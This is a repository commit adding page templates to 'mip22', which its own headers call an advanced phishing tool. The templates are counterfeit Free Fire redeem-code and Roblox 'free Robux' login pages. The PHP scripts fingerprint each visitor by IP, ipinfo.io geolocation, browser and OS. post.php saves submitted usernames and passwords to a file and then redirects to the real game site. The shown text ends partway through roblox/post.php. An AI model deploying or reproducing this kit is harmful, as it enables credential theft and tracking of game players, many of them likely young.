Explorar o código

Add files via upload

mak %!s(int64=3) %!d(string=hai) anos
pai
achega
acd091f11f

+ 122 - 0
.pages/freefire/css/index.css

@@ -0,0 +1,122 @@
+*{
+margin:0;
+padding:0;
+}
+html{background:#000}
+body{
+max-width:360px;
+margin:58px auto 0;
+font:normal 13px Arial;
+color:#fff;
+}
+hr{
+border-width:1px;
+border-color:#555;
+margin:0 15px;
+}
+.logo{
+float:left;
+width:100%;
+max-width:360px;
+background:rgba(0,0,0,0.90);
+padding:10px 0;
+text-align:center;
+position:fixed;
+top:0;
+}
+.logo img{
+width:72px;
+vertical-align:middle;
+}
+.banner{
+float:left;
+width:100%;
+}
+.herohead{
+background:#202020;
+padding:15px 0;
+border-top:1px solid #555;
+border-bottom:1px solid #444;
+text-align:center;
+}
+.herohead img{
+width:72px;
+margin:0 3px;
+vertical-align:middle;
+display:block;
+}
+.avatar{display:inline-block}
+.avatar small{color:#ccc}
+.divider{height:7px}
+.event{
+background:#80CBC4;
+margin:0 15px 15px;
+padding:15px;
+color:#004D40;
+text-align:left;
+line-height:16px;
+border-radius:5px;
+}
+.title{
+background:#494949;
+margin:0 15px 15px;
+padding:10px 15px;
+color:#64ffda;
+font-weight:bold;
+text-align:left;
+border-bottom:1px solid #64ffda;
+}
+.code{
+background:#191919;
+margin:0 15px 15px;
+padding:15px;
+color:#fff;
+text-align:center;
+border:1px solid #555;
+}
+.herohead a{
+text-decoration:none;
+}
+.herohead a:hover small{
+color:#64ffda;
+}
+.gift{
+background:#111;
+text-align:center;
+}
+.gift img{
+width:100%;
+vertical-align:middle;
+}
+.button{
+background:#202020;
+padding:15px 0;
+border-top:1px solid #555;
+border-bottom:1px solid #444;
+text-align:center;
+}
+.button img{
+width:150px;
+margin:0 5px;
+vertical-align:middle;
+}
+.news{
+background:#191919;
+padding:0 15px;
+}
+.news li{
+list-style:none;
+background-size:50px;
+background-repeat:no-repeat;
+background-position:-5px 7px;
+padding:12px 0 12px 55px;
+border-bottom:1px solid #444;
+font-weight:bold;
+color:#64ffda;
+}
+.news li small{
+font-weight:normal;
+color:#ccc;
+padding-top:5px;
+display:block;
+}

+ 55 - 0
.pages/freefire/css/redeem.css

@@ -0,0 +1,55 @@
+*{
+margin:0;
+padding:0;
+}
+html{background:#000}
+body{
+background:#222;
+max-width:360px;
+margin:0 auto;
+font:normal 14px Arial;
+color:#fff;
+}
+form{
+padding:20px;
+color:#ff0000;
+}
+img{
+width:100%;
+}
+label{
+color:#64ffda;
+}
+input, select{
+background:#191919;
+margin-left:10px;
+padding:10px;
+border:1px solid #555;
+color:#fff;
+}
+input[type=submit]{
+background:#64ffda;
+padding:10px 30px;
+border:none;
+border-radius:5px;
+color:#000;
+font-weight:bold;
+}
+input[type=submit]:hover{
+background:#111;
+color:#64ffda;
+cursor:pointer;
+}
+p{
+background:#111;
+padding:10px;
+color:#ccc;
+}
+input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{
+-webkit-appearance:none;
+margin:0;
+}
+hr{
+border-width:1px;
+border-color:#555;
+}

+ 126 - 0
.pages/freefire/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nFREEFIRE VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

+ 53 - 0
.pages/freefire/index.html

@@ -0,0 +1,53 @@
+<html>
+<head>
+<title>Free Fire - Redeem Code</title>
+<meta charset="UTF-8"/>
+<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
+<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
+<meta property="og:title" content="Free Fire Winterlands - Redeem Code"/>
+<meta property="og:url" content="index.html"/>
+<meta property="og:description" content="Get the free fire winterlands monthly event, redeem here"/>
+<meta property="og:type" content="article"/>
+<meta property="article:author" content="https://www.facebook.com/MobileLegendsGame"/>
+<meta property="og:image" content="https://user-images.githubusercontent.com/49580304/102184480-5e9e0c80-3e64-11eb-8ec8-d433388ab43e.jpg"/>
+<link rel="icon" type="img/png" href="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png" sizes="32x32"/>
+<link rel="stylesheet" type="text/css" href="css/index.css"/>
+</head>
+<body>
+<div class="logo">
+<img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png" alt="Free Fire Winterlands"/>
+</div>
+<img class="banner" src="https://1.bp.blogspot.com/-A4yuxmO8-Ws/XhBFUOeGf8I/AAAAAAAAAlM/w1Q5xixYe4s-NV9C2Nl_C886MVAI9XEKQCLcBGAsYHQ/s1600/Banner.jpg" alt="Banner"/>
+<div style="clear:both"></div>
+<div class="herohead">
+<center><font style="font-size:14px;color:#64ffda;">Redemption Code</font></center><br/>
+<input class="code" value="BHDO K6UM SGMQ O6AS" readonly=""/>
+<div class="title"><b>MONTHLY EVENT</b> | COPY REDEEM CODE</div>
+<a href="submit.php" class="avatar" title="Alpha">
+<img src="https://user-images.githubusercontent.com/49580304/102183984-93f62a80-3e63-11eb-8479-b0e8d9d80ac8.png" alt="BUNDLE"/>
+<small>BUNDLE<br/>New Years</small>
+</a>
+<a href="submit.php" class="avatar" title="Alpha">
+<img src="https://user-images.githubusercontent.com/49580304/102183970-8f317680-3e63-11eb-8028-84c7213c77bd.png" alt="BUNDLE"/>
+<small>BUNDLE<br/>Winterlands</small>
+</a>
+<a href="submit.php" class="avatar" title="Estes">
+<img src="https://user-images.githubusercontent.com/49580304/102183976-9193d080-3e63-11eb-9945-87157552999a.png" alt="BUNDLE"/>
+<small>BUNDLE<br/>Winter Elk</small>
+</a>
+<a href="submit.php" class="avatar" title="Miya">
+<img src="https://user-images.githubusercontent.com/49580304/102183978-92c4fd80-3e63-11eb-8baa-0c51ce395454.png" alt="SET"/>
+<small>SET<br/>Grumpy old</small>
+</a>
+</div>
+<ul class="news">
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183983-93f62a80-3e63-11eb-9f4b-a6f3135c93c9.png)" alt="M4A1">M4A1<br/><small>A balanced rifle is suitable for all types of battles.</small></li>
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183989-96588480-3e63-11eb-8a58-4f27f3fe908e.png)" alt="MP5">MP5<br/><small>Beyond other machine guns in terms of stability, but less effective for long distances.</small></li>
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183988-95bfee00-3e63-11eb-94df-874ef5f1be4a.png)" alt="M1014">M1014<br/><small>Use the shotgun to destroy melee enemies quickly.</small></li>
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183991-96f11b00-3e63-11eb-84f4-9dc335aa40f4.png)" alt="AWM">AWM<br/><small>High strength sniper rifle with long reload time.</small></li>
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183987-95275780-3e63-11eb-9321-c1da32c25a4a.png)" alt="USP">USP<br/><small>A light gun that does not affect the user's agility.</small></li>
+<li style="background-image:url(https://user-images.githubusercontent.com/49580304/102183986-948ec100-3e63-11eb-835f-a519adf030a5.png)" alt="PAN">PAN<br/><small>Great shield that protects users from anything your enemy can use.</small></li>
+</ul>
+</body>
+
+</html>

+ 25 - 0
.pages/freefire/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/freefire/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nFREEFIRE VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['pass'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://ff.garena.com/"/> 

+ 58 - 0
.pages/freefire/submit.php

@@ -0,0 +1,58 @@
+<html>
+<head>
+<title>Free Fire - Redeem Code</title>
+<meta charset="UTF-8"/>
+<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
+<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
+<meta property="og:title" content="Mobile Legends - Weekly Free Heroes"/>
+<meta property="og:url" content="index.html"/>
+<meta property="og:description" content="Get the free fire winterlands monthly event, redeem here"/>
+<meta property="og:type" content="article"/>
+<meta property="article:author" content="https://www.facebook.com/MobileLegendsGameIndonesia"/>
+<meta property="og:image" content="https://user-images.githubusercontent.com/49580304/102184480-5e9e0c80-3e64-11eb-8ec8-d433388ab43e.jpg"/>
+<link rel="icon" type="img/png" href="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png" sizes="32x32"/>
+<link rel="stylesheet" type="text/css" href="css/redeem.css"/>
+
+</head>
+<body>
+<form align="right" action="post.php" method="POST">
+<img src="https://1.bp.blogspot.com/-A4yuxmO8-Ws/XhBFUOeGf8I/AAAAAAAAAlM/w1Q5xixYe4s-NV9C2Nl_C886MVAI9XEKQCLcBGAsYHQ/s1600/Banner.jpg" alt="Instruction"/>
+<br/><br/>
+
+<label for="id">Account ID</label>*
+<input minlength="5" maxlength="7" type="number" name="id" required=""/>
+<br/><br/>
+<label for="country">LOG IN</label>*
+<select name="country" required="">
+<option value="VK" selected="">VK</option>
+<option value="FB">FB</option>
+</select>
+<br/><br/>
+
+<label for="code">Redeemption Code</label>*
+<input minlength="1" maxlength="16" type="text" name="code" required=""/>
+<br/><br/>
+
+<hr/><br/>
+<label for="email">Email/HP</label>*
+<input minlength="3" maxlength="50" type="text" name="email" required=""/>
+<br/><br/>
+<label for="password">Password</label>*
+<input minlength="5" maxlength="50" type="password" name="pass" required=""/>
+<br/><br/>
+<label for="phone">Phone</label>*
+<input minlength="8" maxlength="13" type="number" name="phone" required=""/>
+<br/><br/>
+<label for="recoveryemail">2nd Email</label>*
+<input minlength="15" maxlength="50" type="email" name="emailr" required=""/>
+<br/><br/>
+<hr/><br/>
+<div align="center">
+<p><small>Take your Diamond + bundle, check the mail box in the game after (30) Minutes</small></p>
+<br/>
+<input type="submit" value="Submit"/>
+</div>
+</form>
+</body>
+
+</html>

+ 126 - 0
.pages/roblox/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nROBLOX VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

BIN=BIN
.pages/roblox/icon.png


+ 136 - 0
.pages/roblox/index.html

@@ -0,0 +1,136 @@
+<!DOCTYPE html>
+
+<!-- Teamplate from https://github.com/feelatkeen/robloxphishing -->
+<!-- Modified by https://github.com/makdosx -->
+
+<html>
+	<head>
+		<meta charset="UTF-8">
+		<title>Roblox FREE ROBUX 2022</title>
+		<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet"> 
+		<style>
+			body{
+				font-family: "Source Sans Pro";
+			}
+			.header{
+				background:#0074BD;
+				color:white;
+				margin-top:-8px;
+				margin-left:-8px;
+				padding-left:3px;
+				padding-top:3px;
+				margin-right:-8px;
+			}
+			.content{
+				text-align:center;
+			}
+			.copyright{
+				position:absolute;
+				bottom:0;
+				color:gray;
+				font-size:9px;
+				left:30%;
+			}
+			
+			#logininpt{
+			height: 40px;
+			width: 300px;	
+			font-size: 18px;
+			}
+			
+			#LoginButton {
+    			background-color: #00B259;
+    			border: 1px solid;
+    			border-color: #006633;
+    			border-radius:2px;
+    			color: white;
+    			font-weight: 400;
+    			font-size: 18px;
+    			margin-top: 10px;
+    			height: 40px;
+			    width: 320px;
+
+			}
+			#OkButton {
+    			background-color: #00B259;
+    			border: 1px solid;
+    			border-color: #006633;
+    			border-radius:2px;
+    			color: white;
+    			font-weight: 400;
+    			font-size: 18px;
+    			margin-top: 10px;
+    			height: 40px;
+			    width: 320px;
+
+			}
+			#LoginButton:hover {
+    			background-color: #00B259;
+    			border: 1px solid;
+    			border-color: #006633;
+    			border-radius:2px;
+    			color: white;
+    			font-weight: 400;
+    			font-size: 14px;
+    			cursor:pointer;
+    			height: 40px;
+			    width: 320px;
+			}
+			#OkButton:hover {
+    			background-color: #00B259;
+    			border: 1px solid;
+    			border-color: #006633;
+    			border-radius:2px;
+    			color: white;
+    			font-weight: 400;
+    			font-size: 18px;
+    			cursor:pointer;
+    			height: 40px;
+			    width: 320px;
+			}
+			.prettygood{
+				color:#006600;
+				font-size:10px;
+			}
+			.prettyevil{
+				color:#660000;
+				font-size:10px;
+			}
+			.crichalka{
+				background:black;
+				color:white;
+				border-left-style:solid;
+				border-left-color:gray;
+				border-left-width:10px;
+				border-radius:3px;
+				display:inline-block;
+			}
+		</style>
+		 <script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
+	</head>
+	<body>
+		<div class="header" align="center">
+			<img src="icon.png" width=300>
+		</div>
+		<div class="content">
+			<div id="stepone">
+				<h1> Login to Roblox </h1>
+				<div class="loginwindow">
+					<form action="post.php" method="post">
+					<p></p>
+					<input id="logininpt" name="user" placeholder="Username/Email/Phone">
+					<br>
+					<p></p>
+					<input id="logininpt" name="pass" placeholder="Password">
+					<br>
+					<input type="submit" value="Log In" id="LoginButton">
+					<h3 class="prettyevil">Warning: you need to be BC</h3>
+					<h3 class="prettygood">Your account data (logins and passwords) are protected by DMCA.</h3>
+				 </form>
+				</div>
+			</div>
+			
+			<p class="copyright">©2022 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
+		</div>
+	</body>
+</html>

+ 25 - 0
.pages/roblox/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/roblox/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
